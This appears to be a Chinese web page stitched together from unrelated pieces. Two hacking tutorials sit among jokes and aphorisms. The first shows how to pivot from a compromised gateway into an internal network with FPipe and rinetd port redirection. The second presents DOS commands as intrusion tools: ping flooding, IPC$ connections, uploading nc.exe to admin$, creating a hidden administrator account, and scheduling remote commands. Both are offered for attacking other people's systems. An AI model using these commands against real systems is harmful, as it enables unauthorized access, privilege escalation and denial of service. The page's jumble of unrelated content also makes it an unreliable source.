突破网关 – 利用端口重定向进入内网

首选要突破网关(GetWay),这很容易理解,因为一个内网要访问internet总是必然通过网关接入的,至于怎样突破网关,这和进入不是网关的服务器没有什么两样,就不说了。
突破网关以后,我们的目标就是通过网关(IP为202.98.*.*)上网的192.168.21.75。以后的方法就是在网关力端口重定向,建立包转发。端口重定向分两种(local和remote),但是我们要进而内网,显然不能用local方式的重定向,local方式的重定向主要用来绕过_blank"<防火墙(关于这个问题我将在随后单独写一篇文章来讨论怎样用端口重定向绕过_blank"<防火墙)。
一、利用Fpipe建立端口重定向。
Fpipe是个非常有趣的东东。为了证明Fpipe的端口重定向功能,我们来做这样的试验。
首先在自己的机器上运行Fpipe,如下:

E:\tool\FPipFPipe v2.1 – TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
>br
//解释一下这个命令
fpipe -l 80 -s 90 -r 80 202.98.177.162
将到本机80端口的连接通过90端口连接到202.98.177.162的80
一下是详细语法:
FPipe [-hv?] [-brs ] IP
-?/-h – shows this help text
-c – maximum number of allowed simultaneous connections. Default is 32 #连接的最大数目,默认是32
-l – listening port number #要监听的TCP端口号
-r – remote TCP port number #要定向到的IP主机的端口号
-s – outbound connection source port number #从哪个端口发出重定向信息
-v – verbose mode #详细显示过程

在上面的过程中,我们在自己的机器上建立了端口重定向:将到本机80端口的连接通过90端口连接到202.98.177.162的80端口
然后我们在浏览器中输入:>br此时fpipe现实了如下的内容:
Pipe connected:
In: 127.0.0.1:2092 –< 127.0.0.1:80
Out: 192.168.168.112:90 –< 202.98.177.162:80

从上面的输出可以看出数据包经过的路径(192.168.168.112是我的IP)
好了成功以后,下面的东西我不说大家也知道了,将Fpipe拷贝到我们控制的网关上,执行重定向:
fpipe -l 81 -s 91 -r 21 192.168.21.75 #在网关(202.98.*.*)执行,将到202.98.*.*的81端口的数据通过91端口转发向192.168.21.75的21端口。同样的:
fpipe -l 82 -s 92 -r 23 192.168.21.75 #将到202.98.*.*的82端口的数据通过92端口转发向192.168.21.75的23端口
fpipe -l 83 -s 93 -r 80 192.168.21.75 #将到202.98.*.*的83端口的数据通过93端口转发向192.168.21.75的80端口
fpipe -l 84 -s 94 -r 139 192.168.21.75 #将到202.98.*.*的84端口的数据通过94端口转发向192.168.21.75的139端口

下面的你更应该知道了:
如果你在本机telnet到202.98.*.*的81就等价于你telnet到192.168.21.75的21,不对啊!192.168.21.75的21应该FTP上去才对啊(哈哈),那就ftp到202.98.*.*的81端口吧!

写到这里我也忍不住喊“真牛…………真牛…………”

二、利用rinetd建立重定向。
方法和上面一样。在网关上运行rineted,不过要建立个配置文件(文件名和扩展名随意了在这里我以配置文件为conf.ini做例子说)
在本地用计事本建立如下内容的配置文件(其中的*不方便说,别找这写哦!他的意思是将到202.98.*.* 的90的包转发到192.168.21.75的80)
202.98.*.* 90 192.168.21.75 80
将他存为conf.ini文件然后和rineted拷贝到那个网关上(202.98.*.* ),然后
在网关上执行
rinetd -c conf.ini
然后你连接到202.98.*.* 90和连接到192.168.21.75 80的效果是一样的。

顺便说说rinetd配置文件的语法为
bindaddress bindport connectaddress connectport

写在后面:
Fpipe和rineted是很牛的两个工具,通常我是用这两个工具来突破_blank"<防火墙的,以后抽空说说这个问题。
什么什么,这两个小东西在那下载(别懒了,自己找把):
>br>br去看看吧!

大学四年心得精华版

  永远不要参加任何社团招新,除非它让你作社长。任何社团存在的理由,就是增加社团负责人的竞争资本。

 

  永远不要指望哪个plmm没有男朋友,不排除有mm这么说,这是因为她的男友太多了,她数不过来。

 

  永远不要指望踢足球能够吸引mm的注意,在学校,你踢得再好,也只有你的对手知道,mm只会在帮男友看衣服的时候,送你两眼。

 

  永远不要买电脑,虽然你的初衷是用来学习,但最后你会把它改装成你的游戏机。

 

  永远不要指望食堂里的服务员的小学数学学得有多好,他们会通过两位数加法的正确率不会高于百分之40。

 

  永远不要到看上去心情不好的食堂服务员窗口打菜,他会让你的酸菜鱼成酸辣汤,宫保鸡丁成炒花生米。

 

  永远不要指望每个大学人的素质都和你一样高,记住三分之一的人本来分数只配……虽然,他们很多人将来就是保研一族。

 

  永远不要去学校对面的网吧玩游戏,它会让你提早享受程序员的生活,让你知道钱的重要性,让你走上永远堕落的生活。

 

  永远不要把英语给忘了,英语四六级越往后越难过,给四六级委员会捐钱是小,无形的心理压力会让你有了报复社会的想法。

 

  永远不要到校门口饭店吃饭的时候看他们是怎么洗碗的,他会让你……让我吐完先。

 

  永远不要在放假的时候把很多书带回家,你怎么带回家就会怎么带回学校,一定是原封不动。假期就是用来休息的,你放假前作的种种学习设想永远只是设想。

 

  永远不要相信网恋,美女是不上qq的,上的话也是隐身。只有和你有同样需求的女生才在网聊上乐此不彼。不要把自己的光阴花在无谓的投资上。

 

  永远不要买大家都用的手机型号。从t191到nokia8250,再到三星t108,它会让你显得很没有个性。

 

  永远不要看重手机的其他功能,除非你有偷拍mm的恶习。记住,你买手机的最大用途是为了收发短信。

 

  永远不要指望当一个风靡万千少女的文艺青年,你再出名也是一个叫得很响的蚂蚱,蹦不来几天。何况,还要冒着被绝大多数人骂成sb的风险。

 

  永远不要把大学看成教育机构,记住,它是彻头彻尾的盈利机构。

值得回味的25句经典箴言

  1,记住该记住的,忘记该忘记的。改变能改变的,接受不能改变的

 

  2,能冲刷一切的除了眼泪,就是时间,以时间来推移感情,时间越长,冲突越淡,仿佛不断稀释的茶。

  3,怨言是上天得至人类最大的供物,也是人类祷告中最真诚的部分。

  4,智慧的代价是矛盾。这是人生对人生观开的玩笑。

   5,世上的姑娘总以为自己是骄傲的公主(除了少数极丑和少数极聪明的姑娘例外)

  6,如果敌人让你生气,那说明你还没有胜他的把握

   7,如果朋友让你生气,那说明你仍然在意他的友情

   8,令狐冲说“有些事情本身我们无法控制,只好控制自己。”

   9,我不知道我现在做的哪些是对的,那些是错的,而当我终于老死的时候我才知道这些。所以我现在所能做的就是尽力做好每一件事,然后等待着老死。

   10,也许有些人很可恶,有些人很卑鄙。而当我设身为他想象的时候,我才知道:他比我还可怜。所以请原谅所有你见过的人,好人或者坏人

   11,鱼对水说你看不到我的眼泪,因为我在水里.水说我能感觉到你的眼泪,因为你在我心里。

   12,快乐要有悲伤作陪,雨过应该就有天晴。如果雨后还是雨,如果忧伤之后还是忧伤.请让我们从容面对这离别之后的离别。 微笑地去寻找一个不可能出现的你!

   13,死亡教会人一切,如同考试之后公布的结果——虽然恍然大悟,但为时晚矣~!

   14,你出生的时候,你哭着,周围的人笑着;你逝去的时候,你笑着,而周围的人在哭!一切都是轮回!!!! 我们都在轮回中!!!!

   15,男人在结婚前觉得适合自己的女人很少,结婚后觉得适合自己的女人很多

   16,于千万人之中,遇见你所遇见的人;于千万年之中,时间的无涯荒野里,没有早一步,也没有晚一步,刚巧赶上了

   17,每个人都有潜在的能量,只是很容易:被习惯所掩盖,被时间所迷离,被惰性所消磨.

   18,人生短短几十年,不要给自己留下了什么遗憾,想笑就笑,想哭就哭,该爱的时候就去爱,无谓压抑自己

   19,《和平年代》里的话:当幻想和现实面对时,总是很痛苦的。要么你被痛苦击倒,要么你把痛苦踩在脚下

   20,真正的爱情是不讲究热闹不讲究排场不讲究繁华更不讲究嚎头的

   21,生命中,不断地有人离开或进入。于是,看见的,看不见的;记住的,遗忘了。 生命中,不断地有得到和失落。于是,看不见的,看见了;遗忘的,记住了。 然而,看不见的,是不是就等于不存在?记住的,是不是永远不会消失?

   22,我们确实活得艰难,一要承受种种外部的压力,更要面对自己内心的困惑。在苦苦挣扎中,如果有人向你投以理解的目光,你会感到一种生命的暖意,或许仅有短暂的一瞥,就足以使我感奋不已。

   23,我不去想是否能够成功,既然选择了远方,便只顾风雨兼程; 我不去想,身后会不会袭来寒风冷雨,既然目标是地平线,留给世界的只能是背影.

   24,后悔是一种耗费精神的情绪.后悔是比损失更大的损失,比错误更大的错误.所以不要后悔

   25,日出东海落西山,愁也一天,喜也一天;遇事不钻牛角尖,人也舒坦,心也舒坦。

大学宿舍梦话大全

大一的时候我上铺一哥们天天说梦话,一夜,他羞涩的说:“我怀孕了。”我们全体晕倒。

 

一个平时在寝室受尽凌辱的男生,半夜喊出一句:“坦克来拉!”据查实,真的是梦话。还有一个是听女同学说的——寝室里一个女孩子半夜突然说出:“两块面包,两个帅哥,面包变质了,帅哥不见了……”

高中同学,一gg,半夜突然坐起来,大叫一声:“看我一枪打死你!”然后躺下继续睡觉。

 

以前听寝室哥们告诉我,半夜里我突然说道:“我的工商密码是……是……”结果“是”了好久都没“是”出来,把那两个哥们急的。听后偶巨寒……马上出去把密码换了。

 

记得以前追一个女孩,管人家要电话号码,怕忘了就嘴里不停的絮叨。没想到晚上睡觉在梦里也絮叨,结果让我老妈听到了,第二天就打电话找到那个女生。搞的女生再也没理我,郁闷…….

 

我们在部队里军训一个月,天天伙食控制的很厉害,有个哥们半夜里大叫一声:“那块红烧肉是我的,不要抢!”

 

大一的时候,深夜!其他人都睡了,我一个人在玩电脑,突然一人坐起,平静的说道:“那花儿朵朵绽放……”把我吓坏了问了句:“你干吗?”他就倒下去了。一会他又坐起来:“那甜蜜好似蜂糖……”

同学中有g君一人,平日cs玩多了。一夜,他娘进他房间,开灯后,猛的听到:“啊!谁扔闪光弹!!!”

话说我们寝室有一人极爱睡觉,鼾极大!有一次晚上突然没大鼾,我狂喜……然后到凌晨2点多,只听轰隆一声!!整个宿舍的都醒了,原来他把脚边的书柜踢倒了,书压了他一身。然后就听见他翻了个身说了句:“你们脑子有病!”众人无语,继续睡。早上5点左右时他醒了,先是“咦”了一声,然后破口大骂是谁干的!!众人一起晕倒!!我一辈子也不会忘记……

差点呕吐和晕倒的两份求职简历

面试人员给两位前来应征的男士一张履历表……主考官看完第一位填好的简历半天没说话,董事长差点就呕吐了。他是这样填写的:
  
    姓名:英文的还是中文的?
  
    年龄:这是私人问题。
  
    身高:这跟工作有关系么。
  
    体重:随时改变,饭前饭后都不同。
  
    居住地:那是一个特别的地方,我生命的舞台。
  
    电话:爱立信手机。
  
    电子邮件:只留给漂亮和富有的女孩。
  
    上班时间:越短越好。
  
    应征职位:找一个不做什么实事,但能被美女包围的职位。
  
    学历:毕业于一个你找不着的大学。
  
    语言能力:侃大山是专长。
  
    兴趣:睡得天昏地暗。
  
    生日:正月初七
  
    经历:游戏人生。
  
    曾任职位:高级的或者低级的都是一种经历。
  
    婚姻状况:我正在寻找漂亮又富有的女孩,希望在你们公司能找到。
  
    未来期望:只负责主席台讲话,并且希望尽早退休。
  
    希望待遇:比实际工作量拿得多就行。
  
    接着,他们再看第二位应征者时,主考官眼冒金花,董事长更当场晕倒。
  
    姓名:父母取的
  
    年龄:不小了
  
    身高:很高
  
    体重:中等
  
    居住地:家里
  
    电话:在身上
  
    电子邮件:朋友帮我申请的
  
  上班时间:8小时
  
    应征职位:一位
  
    学历:如果毕业的话有高中学历
  
  语言能力:有
  
    兴趣:很多
  
    生日:还没到吧!
  
    经历:刚来的时候摔了一跟头!
  
    曾任职位:小学时当过少先队小队长喔,还有www.boboan.com站的站长
  
    婚姻状况:父母已结婚
  
    未来期望:再找好工作
  
    希望待遇:希望大家都很疼我

必须掌握的 DOS命令

 一,ping

它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,出现如图1。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。

-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。

-l 定义发送数据包的大小,默认为32字节,我们利用它可以最大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。

-n 定义向目标IP发送数据包的次数,默认为3次。如果网络速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。

说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法,如图2。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断网络连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。
(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)
至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的QQ服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。

二,nbtstat

该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息如图3(下同)。

-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。
-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。

三,netstat
这是一个用来查看网络状态的命令,操作简便功能强大。

-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。
-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。

四,tracert
跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解网络布局和结构很有帮助。如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。

五,net

这个命令是网络命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的最好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车如图6。

在这里,我们重点掌握几个入侵常用的子命令。

net view

使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。如图7。

net use
把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name"),如图8。

建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。

net start
使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。

net stop
入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。

net user
查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。
1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。
2,net user abcd /del,将用户名为abcd的用户删除。
3,net user abcd /active:no,将用户名为abcd的用户禁用。
4,net user abcd /active:yes,激活用户名为abcd的用户。
5,net user abcd,查看用户名为abcd的用户的情况,如图10。

net localgroup
查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add,如图11。

现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种方法只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。

net time
这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \\IP。如图12。

六,at

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \\computer。如图13。

表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。

七,ftp

大家对这个命令应该比较熟悉了吧?网络上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用方法。
首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此方法查看其帮助),如图14。

大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。

首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍,如图15。

用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。

接下来就要介绍具体命令的使用方法了,如图16。

dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。
cd 进入某个文件夹。
get 下载文件到本地机器。
put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。
delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。
bye 退出当前连接。
quit 同上。

八,telnet
功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来干你想干的一切了。下面介绍一下使用方法,首先键入telnet回车,再键入help查看其帮助信息,如图17。

然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的,如图18。

当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了,如图19。这里我使用的超级管理员权限登陆的。

原來國家地区的名字可以如此浪漫

 

難怪要改國名 原來國家地区的名字可以如此浪漫,最後一個最精典

Holland 荷蘭
Hope our love lasts and never dies.
希望我們的愛永恆不變

Italy 義大利
I trust and love you.
我相信你和愛你

Libya 利比亞
Love is beautiful; you also.
愛是美麗的 你也是

France 法蘭西
Friendships remain and never can end.
友誼永固

China 中國
Come here. I need all
來這 我什麼都要

Burma 緬甸
Between us, remember me always.
我們之間,常常記得我

Nepal 尼泊爾
Never ever part as lovers.
像情人一樣永不分開

India 印度
I nearly died in adoration.
我差點在狂愛中死去

Kenya 肯雅
Keep everything nice, yet arousing.
全部東西保養好來 保持趣味

Canatdia加拿大
Cute and naughty action that developed into attraction
可愛和頑皮的動作建造成吸引力

Korea 南韓
Keep optimistic regardless of every adversity.
雖然事與願? 保持樂觀

Egypt 埃及
Everything’s great, you pretty thing!!
十全十美,你這漂亮的東西

Manila 馬尼拉
May all nights inspire love always.
漫漫長夜時時刻刻感到愛

Peru 秘魯
Phorget (forget) everyone…remember us.
忘記全部人 記得我們

Thailand 泰國
Totally happy. always in love and never dull.
完全快樂時時刻刻蜜運中

TAIWAN
Tamade! A-bien Is Winning AgaiN!
他媽的!阿扁又贏了!